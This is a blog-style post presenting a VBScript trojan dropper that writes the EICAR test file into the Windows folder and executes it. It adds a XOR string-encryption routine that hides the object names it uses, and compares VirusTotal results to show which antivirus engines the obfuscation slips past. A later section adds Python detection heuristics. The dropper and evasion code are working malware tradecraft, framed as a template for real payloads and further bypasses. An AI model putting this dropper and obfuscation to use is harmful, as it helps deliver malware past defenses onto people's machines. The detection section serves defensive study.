In this antivirus challenge case, I will do some simple things: create a VBS trojan dropper, then apply string encryption to some particular strings. In this case I will encrypt "Scripting.FileSystemObject" and "WScript.Shell". Later I will compare the antivirus detection of the original trojan against the trojan with encrypted strings.
Here's the trojan code. It drops the EICAR test file into the Windows folder and executes it; in reality the dropped file could be any malware.
' EICAR test file as comma-separated hex bytes; an entry longer than two
' characters means "byte, repeat count" (for example "432" = &H43 written twice)
t="58,35,4F,21,50,25,40,41,50,5B,34,5C,50,5A,58,35,34,28,50,5E,29,37,432,29,37,7D,24,45,49,43,41,52,2D,53,54,41,4E,44,41,52,44,2D,41,4E,54,49,56,49,52,55,53,2D,54,45,53,54,2D,46,49,4C,45"
t=t&",21,24,48,2B,48,2A"
tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(0) is the Windows folder
pth = fso.getspecialfolder(0) & "\eicar.com"
' ForWriting is not a VBScript built-in constant; undeclared here it evaluates
' to Empty, so overwrite is False and an existing eicar.com raises an error
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
  l = Len(tmp(i))
  b = Int("&H" & Left(tmp(i), 2))        ' first two hex digits: the byte value
  If l > 2 Then
    r = Int("&H" & Mid(tmp(i), 3, l))    ' remaining digits: the repeat count
    For j = 1 To r
      f.Write Chr(b)
    Next
  Else
    f.Write Chr(b)
  End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth)
For the encryption function, I will use a simple XOR algorithm with the one-character key "0":
Function CryptXor(sText)
  Dim I
  Dim RetStr
  Dim Charuse, CharPwd
  For I = 1 To Len(sText)
    charuse = Mid(sText, I, 1)
    ' key character: "0" repeated over the length of the input
    charpwd = Mid("0", (I Mod Len("0")) + 1, 1)
    ' XOR is its own inverse, so the same function encrypts and decrypts
    retstr = retstr + Chr(Asc(charuse) Xor Asc(charpwd))
  Next
  CryptXor = retstr
End Function
With the encryption applied, two lines of the dropper are modified:
Set fso = CreateObject(CryptXor ("cSBY@DY^W vY\UcICDU]RZUSD"))
and
WScript.CreateObject(CryptXor("gcSBY@D cXU\\")).run(pth)
(Note that the XOR output contains non-printable characters: with key "0", "." becomes &H1E and "O" becomes &H7F. They are lost when the strings are pasted as plain text, so the two literals above are not byte-exact.)
Now I will scan the original and the encrypted version. Here are the results:
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, ClamAV, DrWeb, Emsisoft, eScan, ESET-NOD32, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Yandex, Zillya, ZoneAlarm
Failed antivirus:
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, Webroot
Encrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarm
Four antivirus engines that detected the original fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, Yandex
As you can see from the VirusTotal links, most antivirus engines still detect the threat as EICAR, because the VBS trojan contains the hex code of the EICAR file.
Regarding the detection rate: the antivirus engines that did not detect the sample at all have poor script malware detection. ClamAV, DrWeb, ESET-NOD32 and Yandex are reasonably good, but their detection is easy to bypass.
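On the detection side, a single-character XOR like CryptXor is cheap to undo: a scanner can brute-force all 256 keys and look for the XOR image of known WSH object names, or simply flag string literals that contain control characters. The Python below is an added example written for this post (not the author's code and not part of any antivirus product); the sample script it scans is constructed inline by regenerating the two modified dropper lines with key "0".

```python
import re

# Object names the dropper above hides with CryptXor; plaintext use is also a hit (key 0).
INDICATORS = ("Scripting.FileSystemObject", "WScript.Shell")

def crypt_xor(text: str, key: str) -> str:
    """Same transform as the page's CryptXor: XOR each character with the repeating key.
    XOR is its own inverse, so this both encodes and decodes."""
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))

def find_xor_indicators(script: str):
    """Brute-force every single-byte key and report (key, indicator) pairs whose
    XOR image occurs verbatim in the script text. Returns a sorted list, possibly empty."""
    hits = set()
    for k in range(256):
        for ind in INDICATORS:
            if crypt_xor(ind, chr(k)) in script:
                hits.add((k, ind))
    return sorted(hits)

def literals_with_control_chars(script: str):
    """Cheap heuristic: string literals holding control bytes (0x00-0x1F, 0x7F).
    XOR with the key "0" turns "." into 0x1E and "O" into 0x7F, characters that a
    hand-written VBScript literal would not normally contain."""
    out = []
    for lit in re.findall(r'"([^"\n]*)"', script):
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in lit):
            out.append(lit)
    return out

# Constructed sample (not a real file): the two rewritten dropper lines with key "0",
# regenerated here because the control characters do not survive copy and paste.
SAMPLE_VBS = (
    'Set fso = CreateObject(CryptXor("' + crypt_xor(INDICATORS[0], "0") + '"))\n'
    'WScript.CreateObject(CryptXor("' + crypt_xor(INDICATORS[1], "0") + '")).run(pth)\n'
)

if __name__ == "__main__":
    for key, name in find_xor_indicators(SAMPLE_VBS):
        print(f"key=0x{key:02X} ({chr(key)!r}) hides {name}")
    print(f"{len(literals_with_control_chars(SAMPLE_VBS))} literal(s) contain control characters")
```

A longer repeating key defeats the single-byte brute force, but the control-character heuristic and the plaintext EICAR hex block remain, which is why most engines above still flag the encrypted sample.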
Next time, I will encrypt the hex code of the EICAR file as well, and we will see whether that technique can bypass your antivirus protection.